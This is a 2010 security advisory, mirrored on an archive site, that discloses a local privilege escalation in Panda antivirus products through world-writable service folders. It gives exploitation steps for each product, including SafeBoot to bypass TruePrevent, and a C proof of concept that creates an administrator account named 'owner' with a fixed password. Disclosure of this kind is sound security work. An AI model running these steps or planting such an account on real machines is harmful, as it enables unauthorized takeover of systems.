Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: bu-1549.htm

Panda Security Local Privilege Escalation



NSOADV-2010-001: Panda Security Local Privilege Escalation
NSOADV-2010-001: Panda Security Local Privilege Escalation



______________________________________________
Security Advisory NSOADV-2010-001 (Version 2)
______________________________________________
______________________________________________


  Title:                  Panda Security Local Privilege Escalation
  Severity:               Medium
  Advisory ID:            NSOADV-2010-001
  Found Date:             02.2008
  Date Reported:          30.11.2009
  Release Date:           09.01.2010
  Update Date:            20.01.2010
  Author:                 Nikolas Sotiriu (lofi)
Website: http://sotiriu.de 
  Mail:                   nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2010-001.txt 
Vendor: Panda Security (http://www.pandasecurity.com/) 
  Affected Products:      (Self tested)
                          -Panda Security for Business 4.04.10
                          -Panda Security for Business with Exchange
                           4.04.10
                          -Panda Security for Enterprise 4.04.10
                          -Panda Internet Security 2010 (15.01.00)
                          -Panda Global Protection 2010 (3.01.00)
                          -Panda Antivirus Pro 2010 (9.01.00)
                          -Panda Antivirus for Netbooks (9.01.00)

                          (Provided by Panda)
                          -Panda Global Protection 2009
                          -Panda Internet Security 2009
                          -Panda Antivirus Pro 2009
                          -Panda Internet Security 2008
                          -Panda Antivirus + Firewall 2008
                          -Panda Platinum 2007 Internet Security
                          -Panda Platinum 2006 Internet Security

  Affected Component:     Corporate Products:
                          -Panda Security for Desktops 4.05.10
                          -Panda Security for File Servers 8.04.10

  Remote Exploitable:     No
  Local Exploitable:      Yes
  Patch Status:           Vendor released a patch (See Solution)
  Discovered by:          Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html 
  Thanks to:              Thierry Zoller: For the permission to use his
                                          Policy



Background:
==========
Panda Security for  is the security solution for companies that
need to protect their networks, mainly workstations and file servers.
Panda Security for Business is centrally managed thanks to the
AdminSecure Console, which allows monitoring the entire network,
protecting your critical assets against all types of threats and
optimizing productivity.

(Product description from Panda Website)

This vulnerability is similar to the following vulnerabilities in Panda
products, which where discovered earlier:

Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891 
Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186 
Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615 
Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897 

The earlier reported vulnerabilities only affected the Home user
products. But the business products had the same bug.

More interesting is, that Panda failed since 2006 each year by
releasing the new version with the same old bug.



Description:
===========
1. 32Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During  installation  of  Panda Security for Desktops/File Servers the
permissions for installation folder

%ProgramFiles%\Panda Software\AVTC\

by  default  are  set  to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem  account.

The 32bit Version of Panda Security  for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

    a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
       process
    b. Rename  PAVSRV51.exe to PAVSRV51.old in Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe


2. 64Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During  installation  of  Panda Security for Desktops/File Servers the
permissions for installation folder

%ProgramFiles%\Panda Software\AVTC\

by  default  are  set  to Everyone:Full Control. Few services
(e.g. PavSrvx86.EXE) are started from this folder. Services are started
under LocalSystem  account.

In the 64bit Version of Panda Security  for Desktops/File Servers is no
TruePrevent package available, which protects the files in the
installation directory from manipulation.

There is no protection of service files. It's possible for unprivileged
user to replace service executable with the file of his choice to get
full access with LocalSystem privileges.

This can be exploited by:

    a. Rename  PavSrvX86.exe to PavSrvX86.old in Panda folder
    b. Copy any application to PavSrvX86.exe
    c. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe


3. Panda Internet Security/Global Protection/Antivirus Pro 20XX
+-----------------------------------------------------------------------

During  installation  of the Panda Security 20XX Products the
permissions for installation folder

%ProgramFiles%\panda security\panda \

by  default  are  set  to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem  account.

This products installs the TruePrevent package by default, which
protects the files in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

    a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
       process
    b. Rename  PAVSRV51.exe to PAVSRV51.old in Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
%ProgramFiles%\panda security\panda \firewall\PSHOST.EXE
%ProgramFiles%\Panda Security\Panda \PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda \PsImSvc.exe
%ProgramFiles%\Panda Security\Panda \pavsrv51.exe
%ProgramFiles%\Panda Security\Panda \PskSvc.exe
%ProgramFiles%\Panda Security\Panda \PsCtrls.exe
%ProgramFiles%\Panda Security\Panda \TPSrv.exe


4. Panda Antivirus for Netbooks
+------------------------------

During  installation  of the Panda Antivirus for Netbooks the
permissions for installation folder

%ProgramFiles%\panda security\Panda Antivirus for Netbooks\

by  default  are  set  to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem  account.

This product installs the TruePrevent package by default, which protects
the files in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

    a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
       process
    b. Rename  PAVSRV51.exe to PAVSRV51.old in Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

This product was not patched like the other 2010 products, so the
the following vulnerability already exists:

http://www.securityfocus.com/bid/36897 

TruePrevent bypass: It can be bypassed using "Open" dialog in
"Quarantine" -> Add file" functionality.

Executable started as services:
+------------------------------
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe



Proof of Concept :
=================
#include 
#include 

INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
owner /add", szWinDir );

system( szCmdLine );

return 0;
}



Solution:
========
Home User Products:
+------------------

Panda Advisory
http://www.pandasecurity.com/homeusers/support/card?id=80173&idIdioma=2 

Panda Global Protection 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PGP10/hfgp30906s22_r4.exe 

Panda Internet Security 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PIS10/hfp150906s25_r1.exe 

Panda Antivirus Pro 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PAVPro10/hft90906s21_r1.exe 


Business Products:
+-----------------

Panda Advisory
http://www.pandasecurity.com/enterprise/support/card?id=40061&idIdioma=2 

32Bit Version of Panda Security for Desktops/File Servers Hotfix
http://www.pandasecurity.com/resources/sop/AS0404/CSS_x86_SecurityFix.exe 

64Bit Version of Panda Security for Desktops/File Servers Hotfix
http://www.pandasecurity.com/resources/sop/AS0404/CSS_x64_SecurityFix.exe 



Disclosure Timeline (YYYY/MM/DD):
================================
2008.02.??: Vulnerability found
2008.02.??: Reported to Vendor (no response)
2009.11.28: Tested the current versions and update this advisory
2009.11.30: Asked vendor for a PGP Key
2009.11.30: Vendor sent PGP Key
2009.11.30: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date (2009.12.17) to Vendor
2009.11.30: Vendor acknowledges the reception of the advisory
2009.12.15: Ask for a status update, because the planned release date is
            2009.12.17.
2009.12.15: Panda Security Response Team informs me that they are
            working on a fix and will give me a hotfix publishing date
            tomorrow.
2009.12.16: Panda Security Response Team informs me that they need a few
            more days to prepare the Hotfix publishing.
2009.12.17: Changed release date to 2009.12.23.
2009.12.21: Asked for a list of affected products
2009.12.21: Got a list with affected products and a the wish to delay
            the release to the 2009.12.24.
2009.12.21: Changed release date to 2009.12.24.
2009.12.23: Asked for a list of affected products for the corporate
            suites which was not part of the previously provides list.
            [No response]
2010.01.04: Ask for a status update, because there is no advisory
            published and i didn't got a response to my last mail.
2010.01.05: Panda send me the Link to there advisory (Home User
            Products)
2010.01.05: Asked if the corporate products are patched.
            [No response]
2010.01.07: Informed Panda, that i will release the Advisory on
            2010.01.08
            [No response]
2010.01.09: Release of Advisory draft Version 1
2010.01.11: Panda Security Response Team informs me that they didn't
            published a Hotfix for the Corporate Products.
2010.01.20: Panda published the Advisory and Hotfix for the Corporate
            Products
2010.01.20: Release of Advisory draft Version 2










TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH